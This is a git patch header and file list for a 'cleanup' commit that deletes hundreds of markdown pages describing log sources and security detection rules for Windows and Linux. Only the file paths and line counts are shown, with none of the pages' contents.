From e105700d5876bca2d9a0f20214bfbe798c526e5d Mon Sep 17 00:00:00 2001
From: Yugoslavskiy Daniil <yugoslavskiy@gmail.com>
Date: Wed, 4 Nov 2020 12:13:27 +0100
Subject: [PATCH] cleanup

---
 .../Customers/CU_0001_TESTCUSTOMER.md         |   8 -
 .../Customers/CU_0002_TESTCUSTOMER2.md        |   8 -
 .../DN0001_4688_windows_process_creation.md   |  58 --
 ...ndows_process_creation_with_commandline.md |  59 --
 ...N0003_1_windows_sysmon_process_creation.md |  66 --
 .../DN0004_4624_windows_account_logon.md      |  71 --
 .../DN0005_7045_windows_service_insatalled.md |  49 -
 ...on_process_changed_a_file_creation_time.md |  52 -
 ...007_3_windows_sysmon_network_connection.md |  62 --
 ...ows_sysmon_sysmon_service_state_changed.md |  48 -
 ...009_5_windows_sysmon_process_terminated.md |  49 -
 .../DN0010_6_windows_sysmon_driver_loaded.md  |  51 -
 .../DN0011_7_windows_sysmon_image_loaded.md   |  59 --
 ...012_8_windows_sysmon_CreateRemoteThread.md |  55 -
 .../DN0013_9_windows_sysmon_RawAccessRead.md  |  49 -
 .../DN0014_10_windows_sysmon_ProcessAccess.md |  55 -
 .../DN0015_11_windows_sysmon_FileCreate.md    |  51 -
 .../DN0016_12_windows_sysmon_RegistryEvent.md |  51 -
 .../DN0017_13_windows_sysmon_RegistryEvent.md |  52 -
 .../DN0018_14_windows_sysmon_RegistryEvent.md |  52 -
 ..._15_windows_sysmon_FileCreateStreamHash.md |  52 -
 .../DN0020_17_windows_sysmon_PipeEvent.md     |  51 -
 .../DN0021_18_windows_sysmon_PipeEvent.md     |  51 -
 .../DN0022_19_windows_sysmon_WmiEvent.md      |  52 -
 .../DN0023_20_windows_sysmon_WmiEvent.md      |  52 -
 .../DN0024_21_windows_sysmon_WmiEvent.md      |  51 -
 ...s_directory_service_object_was_modified.md |  59 --
 .../DN0027_4738_user_account_was_changed.md   |  70 --
 ...ervices_restore_mode_admin_password_set.md |  50 -
 ..._4661_handle_to_an_object_was_requested.md |  60 --
 ...62_operation_was_performed_on_an_object.md |  58 --
 .../DN0031_7036_service_started_stopped.md    |  47 -
 ...work_share_object_was_accessed_detailed.md |  57 --
 ..._5140_network_share_object_was_accessed.md |  55 -
 .../DN0034_104_log_file_was_cleared.md        |  50 -
 ...0035_106_task_scheduler_task_registered.md |  46 -
 ...36_4104_windows_powershell_script_block.md |  49 -
 ...3_windows_powershell_executing_pipeline.md |  47 -
 ...state_is_changed_from_none_to_available.md |  42 -
 ...039_524_system_catalog_has_been_deleted.md |  43 -
 ...er_successfully_logged_on_to_a_computer.md |  40 -
 .../Data_Needed/DN0041_529_logon_failure.md   |  39 -
 ...2_675_kerberos_preauthentication_failed.md |  31 -
 ...0_dns_server_plugin_dll_has_been_loaded.md |  46 -
 .../DN0044_1000_application_crashed.md        |  55 -
 .../DN0045_1001_windows_error_reporting.md    |  62 --
 ...allout_dll_file_has_caused_an_exception.md |  45 -
 ...allout_dll_file_has_caused_an_exception.md |  45 -
 ...ervice_successfully_loaded_callout_dlls.md |  46 -
 ...hcp_service_failed_to_load_callout_dlls.md |  45 -
 .../DN0050_1102_audit_log_was_cleared.md      |  50 -
 ...k_surface_reduction_blocking_mode_event.md |  55 -
 .../DN0052_2003_query_to_load_usb_drivers.md  |  46 -
 ...0_pnp_or_power_operation_for_usb_device.md |  53 -
 ...2_pnp_or_power_operation_for_usb_device.md |  53 -
 .../Data_Needed/DN0054_linux_auditd_execve.md |  24 -
 ...DN0055_linux_auditd_read_access_to_file.md |  25 -
 .../DN0056_linux_auditd_syscall.md            |  25 -
 .../DN0057_4625_account_failed_to_logon.md    |  65 --
 ..._4656_handle_to_an_object_was_requested.md |  61 --
 ...DN0059_4657_registry_value_was_modified.md |  58 --
 ...060_4658_handle_to_an_object_was_closed.md |  52 -
 .../DN0061_4660_object_was_deleted.md         |  53 -
 ...63_attempt_was_made_to_access_an_object.md |  57 --
 ...697_service_was_installed_in_the_system.md |  53 -
 .../DN0064_4698_scheduled_task_was_created.md |  50 -
 ...DN0065_4701_scheduled_task_was_disabled.md |  50 -
 .../DN0066_4704_user_right_was_assigned.md    |  50 -
 ...67_4719_system_audit_policy_was_changed.md |  52 -
 ..._added_to_security_enabled_global_group.md |  54 -
 ...s_added_to_security_enabled_local_group.md |  54 -
 ...ecurity_enabled_local_group_was_changed.md |  54 -
 ...curity_enabled_global_group_was_changed.md |  54 -
 ...ity_enabled_universal_group_was_changed.md |  54 -
 ...d_to_a_security_enabled_universal_group.md |  54 -
 ...765_sid_history_was_added_to_an_account.md |  40 -
 ...to_add_sid_history_to_an_account_failed.md |  38 -
 ...ros_authentication_ticket_was_requested.md |  58 --
 ...9_kerberos_service_ticket_was_requested.md |  55 -
 ...4771_kerberos_pre_authentication_failed.md |  55 -
 ...validate_the_credentials_for_an_account.md |  48 -
 .../Data_Needed/DN0080_5859_wmi_activity.md   |  53 -
 .../Data_Needed/DN0081_5861_wmi_activity.md   |  50 -
 .../DN0082_8002_ntlm_server_blocked_audit.md  |  49 -
 ...3_16_access_history_in_hive_was_cleared.md |  48 -
 .../Data_Needed/DN0084_av_alert.md            |  59 --
 .../DN0085_22_windows_sysmon_DnsQuery.md      |  52 -
 .../DN0086_4720_user_account_was_created.md   |  69 --
 ...ering_platform_has_permitted_connection.md |  57 --
 .../DN0088_4616_system_time_was_changed.md    |  52 -
 ...server_security_layer_detected_an_error.md |  42 -
 ...server_security_layer_detected_an_error.md |  42 -
 .../DN0091_linux_modsecurity_log.md           |  25 -
 .../Data_Needed/DN0092_unix_generic_syslog.md |  25 -
 .../Data_Needed/DN0093_linux_clamav_log.md    |  25 -
 .../Data_Needed/DN0094_linux_sshd_log.md      |  25 -
 .../Data_Needed/DN0095_linux_auth_pam_log.md  |  25 -
 .../DN0096_linux_named_client_security_log.md |  25 -
 .../Data_Needed/DN0097_linux_daemon_log.md    |  25 -
 .../Data_Needed/DN0098_linux_vsftpd_log.md    |  25 -
 .../Data_Needed/DN0099_Bind_DNS_query.md      |  25 -
 .../Data_Needed/DN0100_Passive_DNS_log.md     |  25 -
 ...N0108_150_dns_server_could_not_load_dll.md |  25 -
 .../Detection_Rules/av_exploiting.md          | 187 ----
 .../Detection_Rules/av_password_dumper.md     | 188 ----
 .../Detection_Rules/av_relevant_files.md      | 193 ----
 .../Detection_Rules/av_webshell.md            | 183 ----
 .../Detection_Rules/mal_azorult_reg.md        | 180 ----
 .../powershell_alternate_powershell_hosts.md  | 185 ----
 .../powershell_clear_powershell_history.md    | 177 ----
 .../powershell_create_local_user.md           | 180 ----
 .../powershell_data_compressed.md             | 180 ----
 .../powershell_dnscat_execution.md            | 171 ----
 .../powershell_downgrade_attack.md            | 181 ----
 .../powershell_exe_calling_ps.md              | 182 ----
 ...shell_invoke_obfuscation_obfuscated_iex.md | 192 ----
 .../powershell_malicious_commandlets.md       | 273 -----
 .../powershell_malicious_keywords.md          | 196 ----
 ...owershell_nishang_malicious_commandlets.md | 248 -----
 .../powershell_ntfs_ads_access.md             | 178 ----
 .../powershell_prompt_credentials.md          | 181 ----
 .../Detection_Rules/powershell_psattack.md    | 177 ----
 .../powershell_remote_powershell_session.md   | 179 ----
 .../powershell_shellcode_b64.md               | 184 ----
 .../powershell_suspicious_download.md         | 179 ----
 ...owershell_suspicious_invocation_generic.md | 181 ----
 ...wershell_suspicious_invocation_specific.md | 178 ----
 .../powershell_suspicious_keywords.md         | 184 ----
 .../powershell_suspicious_profile_create.md   | 181 ----
 .../powershell_winlogon_helper_dll.md         | 181 ----
 .../Detection_Rules/powershell_wmimplant.md   | 194 ----
 .../powershell_xor_commandline.md             | 178 ----
 .../Detection_Rules/sysmon_ads_executable.md  | 183 ----
 .../sysmon_alternate_powershell_hosts_pipe.md | 185 ----
 .../sysmon_apt_muddywater_dnstunnel.md        | 180 ----
 .../sysmon_apt_turla_namedpipes.md            | 181 ----
 .../Detection_Rules/sysmon_cactustorch.md     | 183 ----
 .../Detection_Rules/sysmon_cmstp_execution.md | 288 ------
 .../sysmon_cobaltstrike_process_injection.md  | 179 ----
 .../sysmon_createremotethread_loadlibrary.md  | 175 ----
 .../sysmon_cred_dump_tools_named_pipes.md     | 182 ----
 .../Detection_Rules/sysmon_hack_wce.md        | 178 ----
 ...gon_scripts_userinitmprlogonscript_proc.md | 185 ----
 .../Detection_Rules/sysmon_mal_namedpipes.md  | 194 ----
 .../sysmon_password_dumper_lsass.md           | 178 ----
 .../sysmon_possible_dns_rebinding.md          | 223 -----
 ...aw_disk_access_using_illegitimate_tools.md | 195 ----
 .../sysmon_susp_powershell_rundll32.md        | 182 ----
 .../sysmon_suspicious_remote_thread.md        | 234 -----
 .../sysmon_wmi_event_subscription.md          | 177 ----
 .../sysmon_wmi_susp_scripting.md              | 189 ----
 .../Detection_Rules/win_GPO_scheduledtasks.md | 180 ----
 .../win_account_backdoor_dcsync_rights.md     | 179 ----
 .../Detection_Rules/win_account_discovery.md  | 187 ----
 .../win_ad_object_writedac_access.md          | 177 ----
 .../win_ad_replication_non_machine_account.md | 185 ----
 .../win_ad_user_enumeration.md                | 180 ----
 .../Detection_Rules/win_admin_rdp_login.md    | 178 ----
 .../Detection_Rules/win_admin_share_access.md | 176 ----
 .../win_advanced_ip_scanner.md                | 173 ----
 ...win_alert_active_directory_user_control.md | 175 ----
 .../win_alert_ad_user_backdoors.md            | 191 ----
 .../win_alert_enable_weak_encryption.md       | 183 ----
 .../Detection_Rules/win_alert_lsass_access.md | 177 ----
 .../win_alert_mimikatz_keywords.md            | 196 ----
 .../Detection_Rules/win_alert_ruler.md        | 193 ----
 .../win_apt_apt29_thinktanks.md               | 175 ----
 .../Detection_Rules/win_apt_apt29_tor.md      | 195 ----
 .../Detection_Rules/win_apt_babyshark.md      | 191 ----
 .../win_apt_bear_activity_gtr19.md            | 179 ----
 .../Detection_Rules/win_apt_bluemashroom.md   | 176 ----
 .../win_apt_carbonpaper_turla.md              | 179 ----
 .../Detection_Rules/win_apt_chafer_mar18.md   | 483 ---------
 .../Detection_Rules/win_apt_cloudhopper.md    | 179 ----
 .../Detection_Rules/win_apt_dragonfly.md      | 171 ----
 .../Detection_Rules/win_apt_elise.md          | 177 ----
 .../win_apt_emissarypanda_sep19.md            | 168 ----
 .../Detection_Rules/win_apt_empiremonkey.md   | 182 ----
 .../win_apt_equationgroup_dll_u_load.md       | 184 ----
 .../Detection_Rules/win_apt_gallium.md        | 385 -------
 .../Detection_Rules/win_apt_greenbug_may20.md | 197 ----
 .../win_apt_hurricane_panda.md                | 176 ----
 .../win_apt_judgement_panda_gtr19.md          | 191 ----
 .../win_apt_ke3chang_regadd.md                | 183 ----
 .../win_apt_lazarus_session_highjack.md       | 180 ----
 .../Detection_Rules/win_apt_mustangpanda.md   | 179 ----
 .../Detection_Rules/win_apt_slingshot.md      | 268 -----
 .../Detection_Rules/win_apt_sofacy.md         | 186 ----
 .../Detection_Rules/win_apt_stonedrill.md     | 177 ----
 .../Detection_Rules/win_apt_ta17_293a_ps.md   | 174 ----
 .../Detection_Rules/win_apt_tropictrooper.md  | 172 ----
 .../Detection_Rules/win_apt_turla_commands.md | 287 ------
 .../win_apt_turla_comrat_may20.md             | 191 ----
 .../win_apt_turla_service_png.md              | 176 ----
 .../win_apt_unidentified_nov_18.md            | 265 -----
 .../win_apt_winnti_mal_hk_jan20.md            | 190 ----
 .../Detection_Rules/win_apt_wocao.md          | 266 -----
 .../Detection_Rules/win_apt_zxshell.md        | 184 ----
 .../Detection_Rules/win_atsvc_task.md         | 183 ----
 .../win_attrib_hiding_files.md                | 186 ----
 .../Detection_Rules/win_audit_cve.md          | 171 ----
 .../Detection_Rules/win_av_relevant_match.md  | 187 ----
 .../Detection_Rules/win_bootconf_mod.md       | 187 ----
 .../Detection_Rules/win_bypass_squiblytwo.md  | 187 ----
 .../win_change_default_file_association.md    | 186 ----
 .../Detection_Rules/win_cmdkey_recon.md       | 180 ----
 .../win_cmstp_com_object_access.md            | 196 ----
 .../win_commandline_path_traversal.md         | 175 ----
 .../Detection_Rules/win_control_panel_item.md | 187 ----
 ...ng_sensitive_files_with_credential_data.md | 196 ----
 .../Detection_Rules/win_crime_fireball.md     | 182 ----
 .../win_crime_maze_ransomware.md              | 191 ----
 .../win_data_compressed_with_rar.md           | 185 ----
 .../Detection_Rules/win_dcsync.md             | 188 ----
 .../Detection_Rules/win_defender_bypass.md    | 179 ----
 .../Detection_Rules/win_defender_disabled.md  | 178 ----
 .../Detection_Rules/win_defender_threat.md    | 170 ----
 .../win_disable_event_logging.md              | 175 ----
 .../win_dns_exfiltration_tools_execution.md   | 171 ----
 .../win_dpapi_domain_backupkey_extraction.md  | 177 ----
 ...n_dpapi_domain_masterkey_backup_attempt.md | 178 ----
 .../win_dsquery_domain_trust_discovery.md     | 178 ----
 .../win_encoded_frombase64string.md           | 179 ----
 .../Detection_Rules/win_encoded_iex.md        | 181 ----
 .../Detection_Rules/win_etw_modification.md   | 182 ----
 .../win_etw_modification_cmdline.md           | 177 ----
 .../Detection_Rules/win_etw_trace_evasion.md  | 184 ----
 ...iltration_and_tunneling_tools_execution.md | 174 ----
 .../win_exploit_cve_2015_1641.md              | 174 ----
 .../win_exploit_cve_2017_0261.md              | 175 ----
 .../win_exploit_cve_2017_11882.md             | 175 ----
 .../win_exploit_cve_2017_8759.md              | 173 ----
 .../win_exploit_cve_2019_1378.md              | 182 ----
 .../win_exploit_cve_2019_1388.md              | 179 ----
 .../win_exploit_cve_2020_10189.md             | 179 ----
 .../win_exploit_cve_2020_1048.md              | 182 ----
 .../Detection_Rules/win_external_device.md    | 178 ----
 .../win_file_permission_modifications.md      | 183 ----
 .../win_global_catalog_enumeration.md         | 188 ----
 .../win_grabbing_sensitive_hives_via_reg.md   | 190 ----
 .../Detection_Rules/win_hack_bloodhound.md    | 190 ----
 .../Detection_Rules/win_hack_koadic.md        | 180 ----
 .../Detection_Rules/win_hack_rubeus.md        | 186 ----
 .../Detection_Rules/win_hack_secutyxploded.md | 178 ----
 .../Detection_Rules/win_hack_smbexec.md       | 185 ----
 .../Detection_Rules/win_hh_chm.md             | 183 ----
 .../win_hktl_createminidump.md                | 268 -----
 .../Detection_Rules/win_html_help_spawn.md    | 188 ----
 .../Detection_Rules/win_hwp_exploits.md       | 189 ----
 .../win_impacket_lateralization.md            | 212 ----
 .../win_impacket_secretdump.md                | 180 ----
 .../Detection_Rules/win_indirect_cmd.md       | 182 ----
 .../win_install_reg_debugger_backdoor.md      | 184 ----
 .../Detection_Rules/win_interactive_at.md     | 181 ----
 ..._obfuscation_obfuscated_iex_commandline.md | 180 ----
 ...oke_obfuscation_obfuscated_iex_services.md | 353 -------
 .../Detection_Rules/win_lethalhta.md          | 177 ----
 .../Detection_Rules/win_lm_namedpipe.md       | 196 ----
 ...in_local_system_owner_account_discovery.md | 216 ----
 .../win_lsass_access_non_system_account.md    | 186 ----
 .../Detection_Rules/win_lsass_dump.md         | 189 ----
 .../Detection_Rules/win_mal_adwind.md         | 362 -------
 .../win_mal_blue_mockingbird.md               | 361 -------
 .../Detection_Rules/win_mal_creddumper.md     | 379 -------
 .../Detection_Rules/win_mal_flowcloud.md      | 179 ----
 .../win_mal_octopus_scanner.md                | 175 ----
 .../Detection_Rules/win_mal_ryuk.md           | 169 ----
 .../win_mal_service_installs.md               | 188 ----
 .../Detection_Rules/win_mal_ursnif.md         | 174 ----
 .../Detection_Rules/win_mal_wceaux_dll.md     | 180 ----
 .../Detection_Rules/win_malware_dridex.md     | 179 ----
 .../Detection_Rules/win_malware_dtrack.md     | 171 ----
 .../Detection_Rules/win_malware_emotet.md     | 181 ----
 .../Detection_Rules/win_malware_formbook.md   | 183 ----
 .../Detection_Rules/win_malware_notpetya.md   | 195 ----
 .../Detection_Rules/win_malware_qbot.md       | 173 ----
 .../Detection_Rules/win_malware_ryuk.md       | 171 ----
 .../win_malware_script_dropper.md             | 193 ----
 .../win_malware_trickbot_recon_activity.md    | 176 ----
 .../Detection_Rules/win_malware_wannacry.md   | 187 ----
 .../Detection_Rules/win_mavinject_proc_inj.md | 174 ----
 .../win_metasploit_authentication.md          | 183 ----
 ...ltstrike_getsystem_service_installation.md | 375 -------
 ...or_cobaltstrike_getsystem_service_start.md | 198 ----
 .../win_mimikatz_command_line.md              | 196 ----
 .../win_mmc20_lateral_movement.md             | 178 ----
 .../Detection_Rules/win_mmc_spawn_shell.md    | 190 ----
 .../Detection_Rules/win_mshta_javascript.md   | 184 ----
 .../Detection_Rules/win_mshta_spawn_shell.md  | 196 ----
 .../win_multiple_suspicious_cli.md            | 223 -----
 .../Detection_Rules/win_net_enum.md           | 183 ----
 .../Detection_Rules/win_net_ntlm_downgrade.md | 273 -----
 .../Detection_Rules/win_net_user_add.md       | 186 ----
 .../win_netsh_allow_port_rdp.md               | 184 ----
 .../Detection_Rules/win_netsh_fw_add.md       | 179 ----
 .../win_netsh_fw_add_susp_image.md            | 206 ----
 .../win_netsh_packet_capture.md               | 175 ----
 .../Detection_Rules/win_netsh_port_fwd.md     | 175 ----
 .../win_netsh_port_fwd_3389.md                | 175 ----
 .../win_netsh_wifi_credential_harvesting.md   | 173 ----
 .../Detection_Rules/win_network_sniffing.md   | 186 ----
 ...r_renamed_user_account_with_dollar_sign.md | 178 ----
 .../win_new_service_creation.md               | 182 ----
 .../win_non_interactive_powershell.md         | 177 ----
 .../win_not_allowed_rdp_access.md             | 177 ----
 .../Detection_Rules/win_office_shell.md       | 212 ----
 ...n_office_spawn_exe_from_users_directory.md | 192 ----
 .../Detection_Rules/win_overpass_the_hash.md  | 179 ----
 .../Detection_Rules/win_pass_the_hash.md      | 189 ----
 .../Detection_Rules/win_pass_the_hash_2.md    | 187 ----
 .../Detection_Rules/win_pcap_drivers.md       | 191 ----
 .../win_plugx_susp_exe_locations.md           | 247 -----
 .../win_possible_applocker_bypass.md          | 191 ----
 .../Detection_Rules/win_possible_dc_shadow.md | 180 ----
 .../win_powershell_amsi_bypass.md             | 181 ----
 .../win_powershell_audio_capture.md           | 174 ----
 .../win_powershell_b64_shellcode.md           | 176 ----
 .../Detection_Rules/win_powershell_bitsjob.md | 181 ----
 .../win_powershell_dll_execution.md           | 184 ----
 .../win_powershell_downgrade_attack.md        | 187 ----
 .../win_powershell_download.md                | 180 ----
 .../win_powershell_frombase64string.md        | 172 ----
 ...wershell_suspicious_parameter_variation.md | 216 ----
 .../win_powershell_web_request.md             | 280 ------
 .../win_powershell_xor_commandline.md         | 179 ----
 .../win_powersploit_empire_schtasks.md        | 198 ----
 .../Detection_Rules/win_proc_wrong_parent.md  | 193 ----
 ...win_process_creation_bitsadmin_download.md | 187 ----
 .../win_process_dump_rundll32_comsvcs.md      | 182 ----
 .../win_protected_storage_service_access.md   | 174 ----
 .../Detection_Rules/win_psexesvc_start.md     | 174 ----
 ...arkspwdump_clearing_hive_access_history.md | 175 ----
 .../Detection_Rules/win_query_registry.md     | 197 ----
 .../win_rare_schtask_creation.md              | 188 ----
 .../win_rare_schtasks_creations.md            | 194 ----
 .../win_rare_service_installs.md              | 191 ----
 .../win_rdp_bluekeep_poc_scanner.md           | 175 ----
 .../win_rdp_hijack_shadowing.md               | 169 ----
 .../win_rdp_localhost_login.md                | 181 ----
 .../win_rdp_potential_cve-2019-0708.md        | 182 ----
 .../Detection_Rules/win_rdp_reverse_tunnel.md | 193 ----
 .../win_redmimicry_winnti_proc.md             | 179 ----
 ...in_register_new_logon_process_by_rubeus.md | 177 ----
 .../win_remote_powershell_session.md          | 178 ----
 .../win_remote_powershell_session_process.md  | 180 ----
 ...e_registry_management_using_reg_utility.md | 182 ----
 .../win_remote_time_discovery.md              | 181 ----
 .../Detection_Rules/win_renamed_binary.md     | 217 ----
 .../win_renamed_binary_highly_relevant.md     | 202 ----
 .../Detection_Rules/win_renamed_jusched.md    | 177 ----
 .../Detection_Rules/win_renamed_paexec.md     | 186 ----
 .../Detection_Rules/win_renamed_powershell.md | 175 ----
 .../Detection_Rules/win_renamed_procdump.md   | 177 ----
 .../Detection_Rules/win_renamed_psexec.md     | 176 ----
 .../win_run_powershell_script_from_ads.md     | 178 ----
 .../win_sam_registry_hive_handle_request.md   | 181 ----
 .../win_scm_database_handle_failure.md        | 170 ----
 .../win_scm_database_privileged_operation.md  | 170 ----
 .../win_sdbinst_shim_persistence.md           | 177 ----
 .../Detection_Rules/win_service_execution.md  | 178 ----
 .../Detection_Rules/win_service_stop.md       | 179 ----
 .../win_shadow_copies_access_symlink.md       | 178 ----
 .../win_shadow_copies_creation.md             | 183 ----
 .../win_shadow_copies_deletion.md             | 191 ----
 .../win_shell_spawn_susp_program.md           | 198 ----
 .../win_silenttrinity_stage_use.md            | 260 -----
 .../win_soundrec_audio_capture.md             | 175 ----
 .../Detection_Rules/win_spn_enum.md           | 178 ----
 .../win_susp_add_domain_trust.md              | 168 ----
 .../win_susp_add_sid_history.md               | 186 ----
 .../Detection_Rules/win_susp_backup_delete.md | 176 ----
 .../Detection_Rules/win_susp_bcdedit.md       | 182 ----
 .../Detection_Rules/win_susp_bginfo.md        | 179 ----
 .../Detection_Rules/win_susp_calc.md          | 176 ----
 .../Detection_Rules/win_susp_cdb.md           | 177 ----
 .../win_susp_certutil_command.md              | 203 ----
 .../win_susp_certutil_encode.md               | 171 ----
 .../Detection_Rules/win_susp_cli_escape.md    | 180 ----
 .../win_susp_cmd_http_appdata.md              | 182 ----
 .../win_susp_codeintegrity_check_failure.md   | 174 ----
 .../win_susp_codepage_switch.md               | 175 ----
 .../win_susp_commands_recon_activity.md       | 211 ----
 .../win_susp_compression_params.md            | 188 ----
 .../win_susp_comsvcs_procdump.md              | 184 ----
 .../win_susp_control_dll_load.md              | 186 ----
 .../win_susp_copy_lateral_movement.md         | 181 ----
 .../Detection_Rules/win_susp_copy_system32.md | 176 ----
 .../Detection_Rules/win_susp_covenant.md      | 178 ----
 .../win_susp_crackmapexec_execution.md        | 194 ----
 ...usp_crackmapexec_powershell_obfuscation.md | 192 ----
 .../Detection_Rules/win_susp_csc.md           | 176 ----
 .../Detection_Rules/win_susp_csc_folder.md    | 187 ----
 .../Detection_Rules/win_susp_curl_download.md | 180 ----
 .../win_susp_curl_fileupload.md               | 177 ----
 .../win_susp_curl_start_combo.md              | 175 ----
 .../win_susp_dctask64_proc_inject.md          | 182 ----
 .../win_susp_desktopimgdownldr.md             | 185 ----
 .../win_susp_devtoolslauncher.md              | 177 ----
 .../Detection_Rules/win_susp_dhcp_config.md   | 177 ----
 .../win_susp_dhcp_config_failed.md            | 181 ----
 ..._susp_direct_asep_reg_keys_modification.md | 192 ----
 .../win_susp_disable_ie_features.md           | 180 ----
 .../Detection_Rules/win_susp_ditsnap.md       | 177 ----
 .../Detection_Rules/win_susp_dns_config.md    | 180 ----
 .../Detection_Rules/win_susp_dnx.md           | 176 ----
 .../win_susp_double_extension.md              | 185 ----
 .../win_susp_dsrm_password_change.md          | 174 ----
 .../Detection_Rules/win_susp_dxcap.md         | 179 ----
 .../win_susp_eventlog_clear.md                | 193 ----
 .../win_susp_eventlog_cleared.md              | 177 ----
 .../Detection_Rules/win_susp_exec_folder.md   | 193 ----
 .../win_susp_execution_path.md                | 182 ----
 .../win_susp_execution_path_webserver.md      | 186 ----
 .../win_susp_explorer_break_proctree.md       | 173 ----
 .../win_susp_failed_logon_reasons.md          | 184 ----
 .../win_susp_failed_logon_source.md           | 205 ----
 .../win_susp_failed_logons_single_source.md   | 312 ------
 .../win_susp_file_characteristics.md          | 190 ----
 .../Detection_Rules/win_susp_findstr_lnk.md   | 177 ----
 .../win_susp_firewall_disable.md              | 173 ----
 .../Detection_Rules/win_susp_fsutil_usage.md  | 183 ----
 .../Detection_Rules/win_susp_gup.md           | 180 ----
 .../win_susp_interactive_logons.md            | 180 ----
 .../win_susp_iss_module_install.md            | 175 ----
 .../win_susp_kerberos_manipulation.md         | 204 ----
 .../win_susp_ldap_dataexchange.md             | 179 ----
 .../win_susp_local_anon_logon_created.md      | 173 ----
 .../Detection_Rules/win_susp_lsass_dump.md    | 176 ----
 .../win_susp_lsass_dump_generic.md            | 215 ----
 .../win_susp_mshta_execution.md               | 186 ----
 .../Detection_Rules/win_susp_msiexec_cwd.md   | 177 ----
 .../win_susp_msiexec_web_install.md           | 172 ----
 .../Detection_Rules/win_susp_msmpeng_crash.md | 185 ----
 .../Detection_Rules/win_susp_msoffice.md      | 179 ----
 .../Detection_Rules/win_susp_net_execution.md | 206 ----
 .../win_susp_net_recon_activity.md            | 185 ----
 .../win_susp_netsh_dll_persistence.md         | 183 ----
 .../Detection_Rules/win_susp_ntdsutil.md      | 174 ----
 .../Detection_Rules/win_susp_ntlm_auth.md     | 177 ----
 .../Detection_Rules/win_susp_ntlm_rdp.md      | 181 ----
 .../Detection_Rules/win_susp_odbcconf.md      | 182 ----
 .../Detection_Rules/win_susp_openwith.md      | 177 ----
 .../Detection_Rules/win_susp_outlook.md       | 178 ----
 .../Detection_Rules/win_susp_outlook_temp.md  | 175 ----
 .../Detection_Rules/win_susp_ping_hex_ip.md   | 178 ----
 .../win_susp_powershell_empire_launch.md      | 178 ----
 .../win_susp_powershell_empire_uac_bypass.md  | 184 ----
 .../win_susp_powershell_enc_cmd.md            | 194 ----
 .../win_susp_powershell_hidden_b64_cmd.md     | 225 -----
 .../win_susp_powershell_parent_combo.md       | 184 ----
 .../win_susp_powershell_parent_process.md     | 209 ----
 .../Detection_Rules/win_susp_procdump.md      | 189 ----
 .../win_susp_process_creations.md             | 224 -----
 .../win_susp_prog_location_process_starts.md  | 179 ----
 .../Detection_Rules/win_susp_ps_appdata.md    | 177 ----
 .../win_susp_ps_downloadfile.md               | 177 ----
 .../Detection_Rules/win_susp_psexec.md        | 183 ----
 .../win_susp_psr_capture_screenshots.md       | 175 ----
 .../win_susp_raccess_sensitive_fext.md        | 187 ----
 .../Detection_Rules/win_susp_rar_flags.md     | 174 ----
 .../win_susp_rasdial_activity.md              | 177 ----
 .../Detection_Rules/win_susp_rc4_kerberos.md  | 180 ----
 .../win_susp_recon_activity.md                | 179 ----
 .../win_susp_regsvr32_anomalies.md            | 201 ----
 .../win_susp_renamed_dctask64.md              | 180 ----
 .../win_susp_renamed_debugview.md             | 171 ----
 .../Detection_Rules/win_susp_rottenpotato.md  | 180 ----
 .../Detection_Rules/win_susp_run_locations.md | 185 ----
 .../win_susp_rundll32_activity.md             | 191 ----
 .../win_susp_rundll32_by_ordinal.md           | 179 ----
 .../Detection_Rules/win_susp_sam_dump.md      | 175 ----
 .../Detection_Rules/win_susp_samr_pwset.md    | 179 ----
 .../win_susp_schtask_creation.md              | 187 ----
 .../win_susp_script_execution.md              | 182 ----
 .../Detection_Rules/win_susp_sdelete.md       | 188 ----
 .../win_susp_security_eventlog_cleared.md     | 176 ----
 .../win_susp_service_path_modification.md     | 185 ----
 .../win_susp_squirrel_lolbin.md               | 207 ----
 .../Detection_Rules/win_susp_svchost.md       | 182 ----
 .../win_susp_svchost_no_cli.md                | 179 ----
 .../win_susp_sysprep_appdata.md               | 174 ----
 .../Detection_Rules/win_susp_sysvol_access.md | 174 ----
 .../win_susp_taskmgr_localsystem.md           | 171 ----
 .../win_susp_taskmgr_parent.md                | 179 ----
 .../win_susp_time_modification.md             | 184 ----
 .../win_susp_tscon_localsystem.md             | 174 ----
 .../win_susp_tscon_rdp_redirect.md            | 180 ----
 .../win_susp_use_of_csharp_console.md         | 174 ----
 .../win_susp_userinit_child.md                | 173 ----
 .../Detection_Rules/win_susp_whoami.md        | 178 ----
 .../Detection_Rules/win_susp_wmi_execution.md | 186 ----
 .../Detection_Rules/win_susp_wmi_login.md     | 172 ----
 ...suspicious_outbound_kerberos_connection.md | 182 ----
 .../win_svcctl_remote_service.md              | 175 ----
 .../win_syskey_registry_access.md             | 180 ----
 .../win_sysmon_driver_unload.md               | 173 ----
 .../Detection_Rules/win_system_exe_anomaly.md | 208 ----
 .../win_tap_driver_installation.md            | 351 -------
 .../win_tap_installer_execution.md            | 170 ----
 .../win_task_folder_evasion.md                | 191 ----
 .../win_termserv_proc_spawn.md                | 173 ----
 .../Detection_Rules/win_tool_psexec.md        | 279 ------
 ...with_credential_data_via_network_shares.md | 187 ----
 .../Detection_Rules/win_trust_discovery.md    | 177 ----
 .../Detection_Rules/win_uac_cmstp.md          | 189 ----
 .../Detection_Rules/win_uac_fodhelper.md      | 180 ----
 .../Detection_Rules/win_uac_wsreset.md        | 177 ----
 .../Detection_Rules/win_usb_device_plugged.md | 176 ----
 .../win_user_added_to_local_administrators.md | 177 ----
 ...vileged_service_lsaregisterlogonprocess.md | 178 ----
 .../Detection_Rules/win_user_creation.md      | 178 ----
 .../Detection_Rules/win_user_driver_loaded.md | 191 ----
 ...o_change_sevice_image_path_by_non_admin.md | 183 ----
 .../Detection_Rules/win_vul_cve_2020_0688.md  | 176 ----
 .../win_vul_java_remote_debugging.md          | 175 ----
 .../Detection_Rules/win_webshell_detection.md | 192 ----
 .../Detection_Rules/win_webshell_spawn.md     | 189 ----
 .../Detection_Rules/win_whoami_as_system.md   | 176 ----
 .../win_win10_sched_task_0day.md              | 179 ----
 ...n_wmi_backdoor_exchange_transport_agent.md | 176 ----
 .../Detection_Rules/win_wmi_persistence.md    | 183 ----
 ...n_wmi_persistence_script_event_consumer.md | 175 ----
 .../win_wmi_spwns_powershell.md               | 181 ----
 .../win_wmiprvse_spawning_process.md          | 176 ----
 .../Detection_Rules/win_workflow_compiler.md  | 177 ----
 .../Detection_Rules/win_wsreset_uac_bypass.md | 181 ----
 .../win_xsl_script_processing.md              | 177 ----
 .../EN0001_cache_sysmon_event_id_1_info.md    |  36 -
 ...rich_sysmon_event_id_1_with_parent_info.md |  46 -
